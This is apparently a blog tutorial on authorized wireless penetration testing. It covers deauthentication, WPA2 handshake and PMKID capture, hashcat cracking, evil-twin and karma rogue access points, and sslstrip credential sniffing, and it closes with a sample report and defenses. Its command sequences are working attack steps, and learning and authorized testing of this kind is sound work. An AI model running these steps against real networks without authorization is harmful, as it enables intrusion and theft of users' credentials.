Penetration Testing July 4, 2025 ⏱ 7 min read

Ethical Wi-Fi Pentesting: From Recon to Exploitation

A hands-on guide to wireless network penetration testing — monitoring, cracking WPA2/WPA3, evil twin attacks, and client-side exploitation, all within legal and ethical boundaries.

wifipentestingwirelessaircrack-ngwpa2ethical-hacking

Rules of Engagement

Before touching a single packet: you need explicit written authorization. Wi-Fi pentesting without permission is illegal in virtually every jurisdiction. This isn’t a suggestion — it’s the law.

Legal requirements:
  ✓ Written scope document signed by the network owner
  ✓ Defined target SSIDs and BSSIDs
  ✓ Time window for testing
  ✓ Authorized attack types (passive only, active, DoS)
  ✓ Emergency contact if something breaks
  ✗ "My neighbor's Wi-Fi" is never in scope
  ✗ Public Wi-Fi at a coffee shop is never in scope
  ✗ "I'm learning" is not a legal defense

With that clear — let’s break some (authorized) wireless networks.

Hardware Setup

Wireless Adapter Selection

Not all Wi-Fi adapters support monitor mode and packet injection. You need specific chipsets:

Recommended chipsets (2025):
  ✓ MediaTek MT7612U — Dual-band, excellent Linux support
  ✓ Realtek RTL8812AU — 802.11ac, widely available
  ✓ Atheros AR9271 — Classic, bulletproof compatibility
  ✓ Intel AX210 — Built-in on many laptops (limited injection)

Recommended adapters:
  - ALFA AWUS036ACH (Realtek, dual-band, high power)
  - ALFA AWUS036ACHM (MediaTek, newer, great range)
  - Panda PAU09 (budget-friendly, dual-band)

Software Stack

# Kali Linux has everything pre-installed
# On other distros:

# Aircrack-ng suite
sudo apt install aircrack-ng

# Bettercap (Swiss army knife for network attacks)
sudo apt install bettercap

# Hashcat (GPU-accelerated cracking)
sudo apt install hashcat

# hcxdumptool + hcxtools (modern capture tools)
sudo apt install hcxdumptool hcxtools

# Wireshark for packet analysis
sudo apt install wireshark

Phase 1: Reconnaissance

Enable Monitor Mode

# Check your wireless interface
iwconfig

# Kill interfering processes
sudo airmon-ng check kill

# Enable monitor mode
sudo airmon-ng start wlan0
# Interface becomes wlan0mon

# Verify
iwconfig wlan0mon
# Mode should show "Monitor"

Passive Scanning

# Scan all channels for access points and clients
sudo airodump-ng wlan0mon

# Output columns:
# BSSID      — MAC address of the access point
# PWR        — Signal strength (closer to 0 = stronger)
# Beacons    — Number of beacon frames
# #Data      — Number of data frames captured
# CH         — Channel
# ENC        — Encryption type (WPA2, WPA3, OPN)
# ESSID      — Network name

# Focus on target network (authorized target)
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture

Client Enumeration

The bottom section of airodump-ng shows connected clients:

BSSID              STATION            PWR   Rate  Lost  Packets
AA:BB:CC:DD:EE:FF  11:22:33:44:55:66  -42   54e   0     1247
AA:BB:CC:DD:EE:FF  77:88:99:AA:BB:CC  -68   24e   3     89

Document all clients — you’ll need them for deauth attacks and client-side testing.

Phase 2: WPA2-PSK Cracking

The Four-Way Handshake

WPA2-PSK authentication uses a four-way handshake that contains enough information to verify a password guess offline:

Client                          Access Point
  │                                  │
  │ ←── ANonce ──────────────────── │  Message 1
  │                                  │
  │ ──── SNonce + MIC ───────────→  │  Message 2
  │                                  │
  │ ←── GTK + MIC ──────────────── │  Message 3
  │                                  │
  │ ──── ACK ────────────────────→  │  Message 4
  │                                  │

PTK = PRF(PMK, ANonce, SNonce, MAC_AP, MAC_Client)
PMK = PBKDF2(passphrase, SSID, 4096, 256)

Capturing the Handshake

# Method 1: Wait for a client to connect naturally
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshake

# Method 2: Force a reconnection via deauthentication
# (Only on authorized networks!)
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -0 5    = send 5 deauth frames
# -a      = target AP BSSID
# -c      = target client MAC

# Watch airodump-ng for "WPA handshake: AA:BB:CC:DD:EE:FF" in top right

Modern Alternative: PMKID Attack

The PMKID attack doesn’t require a client — it works against the AP directly:

# Capture PMKID using hcxdumptool
sudo hcxdumptool -i wlan0mon -o capture.pcapng \
    --filterlist_ap=AA:BB:CC:DD:EE:FF --filtermode=2 \
    --enable_status=3

# Convert to hashcat format
hcxpcapngtool -o hash.22000 capture.pcapng

# Check if PMKID was captured
cat hash.22000
# WPA*02*... = PMKID
# WPA*01*... = handshake

Cracking with Hashcat

# Dictionary attack
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt

# Rule-based attack (mutations on dictionary words)
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt \
    -r /usr/share/hashcat/rules/best64.rule

# Brute-force 8-digit numeric password
hashcat -m 22000 hash.22000 -a 3 ?d?d?d?d?d?d?d?d

# Mask attack for common patterns (Word + digits)
hashcat -m 22000 hash.22000 -a 3 ?u?l?l?l?l?d?d?d?d

# Check results
hashcat -m 22000 hash.22000 --show

Benchmark: A single RTX 4090 achieves ~2.5 million WPA2 PMKs/second. An 8-character lowercase password falls in minutes.

Phase 3: Evil Twin Attack

An evil twin creates a fake AP that mimics the target, capturing credentials:

# Using bettercap for automated evil twin
sudo bettercap -iface wlan0mon

# Within bettercap:
> wifi.recon on
> wifi.show

# Set up evil twin with captive portal
> set wifi.ap.ssid "CorpNetwork"
> set wifi.ap.bssid AA:BB:CC:DD:EE:FF
> set wifi.ap.channel 6
> set wifi.ap.encryption false
> wifi.ap on

# Deauth clients from real AP to force reconnection to evil twin
> wifi.deauth AA:BB:CC:DD:EE:FF

For a more sophisticated approach with a captive portal:

# Using hostapd-mana + dnsmasq + custom portal
# 1. Create hostapd config
cat > evil_twin.conf << 'EOF'
interface=wlan0mon
driver=nl80211
ssid=CorpNetwork
channel=6
hw_mode=g
EOF

# 2. Start the fake AP
sudo hostapd evil_twin.conf &

# 3. Configure DHCP
sudo dnsmasq --interface=wlan0mon \
    --dhcp-range=10.0.0.10,10.0.0.50,12h \
    --address=/#/10.0.0.1

# 4. Redirect HTTP to captive portal
sudo iptables -t nat -A PREROUTING -p tcp --dport 80 \
    -j REDIRECT --to-port 8080

Phase 4: WPA3 and SAE

WPA3 uses Simultaneous Authentication of Equals (SAE), also known as Dragonfly handshake:

WPA3-SAE improvements over WPA2:
  ✓ Forward secrecy (past sessions can't be decrypted)
  ✓ Resistant to offline dictionary attacks
  ✓ Protected against KRACK-style reinstallation attacks
  ✗ Transition mode (WPA3/WPA2 mixed) is still vulnerable
  ✗ Side-channel attacks (Dragonblood) partially mitigated

Testing WPA3 Transition Mode

Many networks run WPA3 in transition mode for backward compatibility. This is the weak point:

# Force WPA2 connection to a transition-mode AP
# The AP will accept WPA2 clients, enabling traditional attacks

# Check if AP supports transition mode
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6
# Look for "WPA2 WPA3" in ENC column

# If transition mode is enabled:
# Standard WPA2 handshake capture and cracking still works

Phase 5: Client-Side Attacks

Karma Attack (Responding to Probe Requests)

Devices constantly broadcast probe requests for known networks. A karma attack responds to all of them:

# Using bettercap
sudo bettercap -iface wlan0mon

> set wifi.ap.ssid ""
> set wifi.ap.channel 1
> wifi.ap on

# bettercap will respond to client probe requests
# claiming to be whatever network they're looking for

Capturing Credentials from Connected Clients

Once clients connect to your rogue AP:

# Start HTTP/HTTPS proxy to capture credentials
> set http.proxy.sslstrip true
> http.proxy on
> net.sniff on

# Monitor captured credentials
> events.show

Reporting

A pentest is only as valuable as its report. Structure your wireless findings:

## Wireless Penetration Test Report

### Executive Summary
[Non-technical overview of risk level]

### Findings

#### CRITICAL: WPA2-PSK Cracked in 3 Minutes
- **SSID:** CorpNetwork
- **Attack:** PMKID capture + dictionary attack
- **Password:** [redacted] (8-character dictionary word)
- **Impact:** Full network access, lateral movement possible
- **Recommendation:** Migrate to WPA3-SAE only mode,
  enforce 20+ character passphrases, implement 802.1X

#### HIGH: Evil Twin Attack Successful
- **Attack:** Rogue AP with captive portal
- **Result:** 4 employees submitted domain credentials
- **Impact:** Active Directory compromise
- **Recommendation:** User awareness training,
  802.1X with certificate pinning

#### MEDIUM: WPA3 Transition Mode Enabled
- **Risk:** Downgrades WPA3 security to WPA2 level
- **Recommendation:** Disable transition mode,
  ensure all clients support WPA3

Defense Recommendations

For network administrators:
  ✓ Deploy WPA3-SAE only (no transition mode)
  ✓ Use 802.1X/EAP with RADIUS for enterprise networks
  ✓ Implement Wireless Intrusion Detection (wIDS)
  ✓ Monitor for rogue APs continuously
  ✓ Use client isolation on guest networks
  ✓ Disable WPS (Wi-Fi Protected Setup)
  ✓ Segment wireless from critical internal networks
  ✓ Rotate PSK regularly if enterprise auth isn't feasible
  ✓ Train users to verify network authenticity

The airwaves are invisible but far from empty. Test your wireless security before someone else does.